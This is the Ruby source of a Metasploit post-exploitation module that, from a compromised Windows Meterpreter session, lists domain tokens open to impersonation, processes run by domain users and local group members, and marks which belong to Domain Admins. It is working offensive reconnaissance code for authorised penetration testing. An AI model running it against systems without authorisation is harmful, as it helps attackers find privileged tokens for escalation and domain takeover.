metasploit-framework/modules/post/windows/gather/enum_domain_tokens.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Enumerate Domain Tokens',
        'Description' => %q{
          This module enumerates domain account tokens, processes running under
          domain accounts, and domain users in the local Administrators, Users
          and Backup Operator groups.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
        'Platform' => [ 'win'],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              incognito_list_tokens
              stdapi_sys_config_getuid
            ]
          }
        }
      )
    )
  end

  def run
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    domain = get_domain_name

    fail_with(Failure::Unknown, 'Could not retrieve domain name. Is the host part of a domain?') unless domain

    @domain_admins = get_members_from_group('Domain Admins', domain) || []

    print_error("Could not retrieve '#{domain}\\Domain Admins' group members.") if @domain_admins.blank?

    netbios_domain_name = domain.split('.').first.upcase

    uid = client.sys.config.getuid
    if uid.starts_with?(netbios_domain_name)
      user = uid.split('\\')[1]
      print_good('Current session is running under a Domain Admin account') if @domain_admins.include?(user)
    end

    if domain_controller?
      if is_system?
        print_good('Current session is running as SYSTEM on a domain controller')
      elsif is_admin?
        print_good('Current session is running under a Local Admin account on a domain controller')
      else
        print_status('This host is a domain controller')
      end
    else
      if is_system?
        print_good('Current session is running as SYSTEM')
      elsif is_admin?
        print_good('Current session is running under a Local Admin account')
      end
      print_status('This host is not a domain controller')

      list_group_members(netbios_domain_name)
    end

    list_processes(netbios_domain_name)
    list_tokens(netbios_domain_name)
  end

  def list_group_members(domain)
    tbl = Rex::Text::Table.new(
      'Header' => 'Account in Local Groups with Domain Context',
      'Indent' => 1,
      'Columns' =>
      [
        'Local Group',
        'Member',
        'Domain Admin'
      ]
    )

    print_status('Checking local groups for Domain Accounts and Groups')

    [
      'Administrators',
      'Backup Operators',
      'Users'
    ].each do |group|
      group_users = get_members_from_localgroup(group)

      next unless group_users

      vprint_status("Group '#{group}' members: #{group_users.join(', ')}")

      group_users.each do |group_user|
        next unless group_user.include?(domain)

        user = group_user.split('\\')[1]
        tbl << [group, group_user, @domain_admins.include?(user)]
      end
    end

    print_line("\n#{tbl}\n")
  end

  def list_tokens(domain)
    tbl = Rex::Text::Table.new(
      'Header' => 'Impersonation Tokens with Domain Context',
      'Indent' => 1,
      'Columns' =>
      [
        'Token Type',
        'Account Type',
        'Account Name',
        'Domain Admin'
      ]
    )
    print_status('Checking for Domain group and user tokens')

    user_tokens = client.incognito.incognito_list_tokens(0)
    user_delegation = user_tokens['delegation'].split("\n")
    user_impersonation = user_tokens['impersonation'].split("\n")

    user_delegation.each do |dt|
      next unless dt.include?(domain)

      user = dt.split('\\')[1]
      tbl << ['Delegation', 'User', dt, @domain_admins.include?(user)]
    end

    user_impersonation.each do |dt|
      next if dt == 'No tokens available'
      next unless dt.include?(domain)

      user = dt.split('\\')[1]
      tbl << ['Impersonation', 'User', dt, @domain_admins.include?(user)]
    end

    group_tokens = client.incognito.incognito_list_tokens(1)
    group_delegation = group_tokens['delegation'].split("\n")
    group_impersonation = group_tokens['impersonation'].split("\n")

    group_delegation.each do |dt|
      next unless dt.include?(domain)

      user = dt.split('\\')[1]
      tbl << ['Delegation', 'Group', dt, @domain_admins.include?(user)]
    end

    group_impersonation.each do |dt|
      next if dt == 'No tokens available'
      next unless dt.include?(domain)

      user = dt.split('\\')[1]
      tbl << ['Impersonation', 'Group', dt, @domain_admins.include?(user)]
    end

    if tbl.rows.empty?
      print_status('No domain tokens available')
      return
    end

    print_line("\n#{tbl}\n")
  end

  def list_processes(domain)
    tbl = Rex::Text::Table.new(
      'Header' => 'Processes under Domain Context',
      'Indent' => 1,
      'Columns' =>
      [
        'Process Name',
        'PID',
        'Arch',
        'User',
        'Domain Admin'
      ]
    )
    print_status('Checking for processes running under domain user')
    client.sys.process.processes.each do |p|
      next unless p['user'].include?(domain)

      user = p['user'].split('\\')[1]
      tbl << [
        p['name'],
        p['pid'],
        p['arch'],
        p['user'],
        @domain_admins.include?(user)
      ]
    end

    if tbl.rows.empty?
      print_status('No processes running as domain users')
      return
    end

    print_line("\n#{tbl}\n")
  end
end